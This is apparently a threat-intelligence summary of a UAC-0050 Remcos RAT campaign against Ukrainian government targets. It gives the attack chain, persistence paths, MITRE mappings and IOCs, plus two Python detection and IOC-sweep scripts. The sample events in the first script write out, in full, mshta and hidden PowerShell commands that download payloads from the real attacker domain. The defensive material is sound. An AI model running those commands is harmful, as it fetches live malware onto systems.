UAC-0050 Remcos RAT: Pipe Method Used for Evasion in Ukraine Attack

UAC-0050’s operation against Ukrainian government targets delivers RemcosRAT and passes the decrypted payload between processes over a Windows pipe, keeping it in memory and out of reach of file-based EDR/antivirus scanning. The chain is multi-stage (LNK → HTA → VBScript → PowerShell) and ends with RemcosRAT executing in memory, a stealth-focused approach that, given the targeting, carries geopolitical risk for government systems.

#RemcosRAT #UAC-0050

Keypoints

  • UAC-0050 targets Ukrainian government entities with RemcosRAT, passing the decrypted payload between processes through a pipe so that it stays in memory and out of the reach of file-based EDR/AV scanning.
  • The attack chain starts with a malicious LNK, proceeds through an HTA and an obfuscated VBScript to PowerShell, which downloads word_update.exe from new-tech-savvy[.]com and runs it.
  • Persistence is a copy of word_update.exe dropped as fmTask_dbg.exe under %APPDATA%\WordpadService, relaunched at logon by a Startup-folder shortcut (fmTask_dbg.lnk).

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Initial access is assessed, not confirmed, to be phishing or spam email posing as job offers. Quote: ‘indications lean towards phishing or spam emails, masked as job propositions.’
  • [T1218.005] Mshta – The threat uses MSHTA to execute embedded content after deobfuscation. Quote: ‘the string is then executed using MSHTA.’
  • [T1059.005] Command and Scripting Interpreter: VBScript – The HTA contains a VBScript with fully obfuscated script content. Quote: ‘VBScript file with fully obfuscated script content.’
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell script downloads a malicious payload and executes it. Quote: ‘download a malicious payload (word_update.exe) from a server’ and ‘execute the decrypted payload as a new PowerShell process.’
  • [T1559] Inter-Process Communication – The decrypted payload is passed to a child process through an anonymous (unnamed) pipe instead of being written to disk; no T1559 sub-technique covers pipes (T1559.001 is Component Object Model), so the parent technique applies. Quote: ‘shares malicious data through a pipe’ and ‘unnamed pipes’.
  • [T1055] Process Injection – The decrypted Remcos binary is staged in a read/write region of cmd.exe’s memory and injected into explorer.exe, so it never touches disk. Quote: ‘Remcos binary in the memory of cmd.exe (RW)’ and ‘execution flow from word_update.exe.’
  • [T1105] Ingress Tool Transfer – Malicious payload downloaded from a remote server. Quote: ‘download a malicious payload (word_update.exe) from a server.’
  • [T1071.001] Web Protocols – Payloads are downloaded from the domain new-tech-savvy[.]com. Quote: ‘download a malicious payload (word_update.exe) from a server’ and ‘domain new-tech-savvy[.]com.’
  • [T1518.001] Software Discovery: Security Software Discovery – The LNK stage enumerates antivirus products installed on the target. Quote: ‘gathers information regarding antivirus products installed on the target computer.’
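The technique list above describes a process chain (mshta → PowerShell download → word_update.exe → cmd.exe → explorer.exe) that a SOC can hunt for in process-creation telemetry. The following is an added example, not code from the Uptycs write-up: it runs three chain-aware rules over constructed Sysmon-style process-creation records that mirror the described chain. The PIDs, the victim user name, the parent of mshta.exe and the exact command lines are assumptions for illustration.

```python
import re

# Constructed Sysmon Event ID 1-style records (pid, ppid, image, command line) that
# mirror the chain the article describes. PIDs, the victim user name and the exact
# command lines are assumptions for illustration, not data from the write-up.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # LNK double-click: mshta pulls the remote HTA (T1218.005)
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://new-tech-savvy.com/6.hta"},
    # HTA/VBScript stage hands off to PowerShell, which fetches word_update.exe (T1059.001, T1105)
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
            "'https://new-tech-savvy.com/word_update.exe','word_update.exe')"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\victim\AppData\Roaming\word_update.exe",
     "cmd": "word_update.exe"},
    # pipe hand-off: word_update.exe -> cmd.exe -> explorer.exe (T1559, T1055)
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # benign noise: an interactive PowerShell session
    {"pid": 700, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Process"},
]

REMOTE_HTA_RE = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|https?://", re.IGNORECASE)


def proc_name(image):
    """Basename of an image path, lower-cased for comparison."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid):
    """Process names from the immediate parent upward (stops at an unknown parent or a loop)."""
    names, seen, cur = [], {pid}, by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        names.append(proc_name(cur["image"]))
    return names


def detect(events):
    """Return (rule, pid) findings in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = proc_name(e["image"])
        parents = ancestry(by_pid, e["pid"])
        # Rule 1: mshta.exe executing a remote .hta (T1218.005)
        if name == "mshta.exe" and REMOTE_HTA_RE.search(e["cmd"]):
            findings.append(("mshta_remote_hta", e["pid"]))
        # Rule 2: PowerShell with mshta.exe anywhere in its ancestry that performs a download
        if name == "powershell.exe" and "mshta.exe" in parents and DOWNLOAD_RE.search(e["cmd"]):
            findings.append(("mshta_descendant_powershell_download", e["pid"]))
        # Rule 3: explorer.exe started by cmd.exe whose own parent runs out of %AppData%\Roaming;
        # explorer.exe is normally started by userinit/winlogon, not by a console shell
        if name == "explorer.exe" and len(parents) >= 2 and parents[0] == "cmd.exe":
            grandparent = by_pid[by_pid[e["ppid"]]["ppid"]]
            if "\\appdata\\roaming\\" in grandparent["image"].lower():
                findings.append(("appdata_binary_cmd_explorer_chain", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 2 walks the full ancestry rather than checking the direct parent only, because the HTA's VBScript may insert wscript.exe or another intermediate process between mshta.exe and powershell.exe; the interactive PowerShell session in the sample is correctly left alone. Rule 3 is the pipe hand-off indicator: the pipe itself is not visible in process-creation events, but a console shell spawned by a binary in the roaming profile that in turn starts explorer.exe is.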

Indicators of Compromise

  • [File Hash, MD5] LNK file – 56154fedaa70a3e58b7262b7c344d30a, 7f87d36c989a11edf0de9af392891d89, and 1 more hash
  • [File Hash, MD5] 6.hta – 9b777d69b018701ec5ad19ae3f06553f
  • [File Hash, MD5] ofer.docx – 74865c6c290488bd5552aa905c02666c
  • [File Hash, MD5] word_update.exe / fmTask_dbg.exe – 7c05cfed156f152139a6b1f0d48b5cc1 (fmTask_dbg.exe is the persistence copy of word_update.exe and carries the same hash)
  • [File Hash, MD5] Remcos – 0b2d0eb5af93a3355244e1319e3de9da
  • [Domain] new-tech-savvy[.]com – payload host; 2 more domains/URLs listed in the article
  • [IP] 194.87.31[.]229, 46.249.58[.]40 – observed hosts for C2 or download
  • [URL] new-tech-savvy[.]com/6.hta, new-tech-savvy[.]com/word_update.exe, new-tech-savvy[.]com/ofer.docx
  • [File Path] C:\Users\<user>\AppData\Roaming\WordpadService\fmTask_dbg.exe – persistence copy of word_update.exe
  • [File Path] C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fmTask_dbg.lnk – Startup-folder shortcut that relaunches it at logon
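The hashes and persistence paths above are the host-side indicators an incident responder sweeps for. The following is an added example, not the article's tooling: it walks a directory tree (a live profile or a mounted image), hashes every file against the published MD5s, and flags the two persistence artifacts by path suffix so the match works for any user name. The sample profile it builds is constructed, and the planted files do not hash to the real IOC values; the "1 more hash" entries the summary elides are not included.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# MD5s from the IOC list above (the article publishes MD5, so that is what we match on).
IOC_MD5 = {
    "56154fedaa70a3e58b7262b7c344d30a",  # LNK
    "7f87d36c989a11edf0de9af392891d89",  # LNK
    "9b777d69b018701ec5ad19ae3f06553f",  # 6.hta
    "74865c6c290488bd5552aa905c02666c",  # ofer.docx
    "7c05cfed156f152139a6b1f0d48b5cc1",  # word_update.exe / fmTask_dbg.exe
    "0b2d0eb5af93a3355244e1319e3de9da",  # Remcos
}

# Persistence artifacts as lower-case, forward-slash path suffixes: independent of the
# user name, the drive letter and whether the tree is a live host or a mounted image.
PERSISTENCE_SUFFIXES = (
    "appdata/roaming/wordpadservice/fmtask_dbg.exe",
    "appdata/roaming/microsoft/windows/start menu/programs/startup/fmtask_dbg.lnk",
)


def md5_of(path, chunk=1 << 20):
    """MD5 of a file, read in chunks so large binaries do not load into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def normalize(path):
    return str(path).replace("\\", "/").lower()


def hunt(root, ioc_md5=IOC_MD5):
    """Return sorted (kind, path) findings for every file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            if normalize(p).endswith(PERSISTENCE_SUFFIXES):
                findings.append(("persistence_path", str(p)))
            try:
                digest = md5_of(p)
            except OSError:
                continue  # locked or unreadable file: skip it rather than abort the sweep
            if digest in ioc_md5:
                findings.append(("hash_match", str(p)))
    return sorted(findings)


def make_sample_profile():
    """Create a throwaway profile tree with both persistence artifacts planted.
    File contents are constructed stand-ins and do not hash to the IOC values."""
    root = Path(tempfile.mkdtemp(prefix="uac0050_demo_"))
    planted = {
        "AppData/Roaming/WordpadService/fmTask_dbg.exe": b"MZ constructed stand-in",
        "AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/fmTask_dbg.lnk":
            b"L\x00\x00\x00 constructed LNK stand-in",
        "Documents/notes.txt": b"benign file",
    }
    for rel, data in planted.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    return root


if __name__ == "__main__":
    profile = make_sample_profile()
    for kind, path in hunt(profile):
        print(f"{kind}: {path}")
```

Path matching is deliberately separate from hash matching: the actor can rebuild word_update.exe and change every hash, but the WordpadService folder name and the Startup shortcut are part of the persistence mechanism and survive a recompile. On a real host, run the sweep over every profile under C:\Users (and over the mounted image for offline triage), and treat a persistence-path hit with a non-matching hash as a likely new variant rather than a false positive.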

Read more: https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method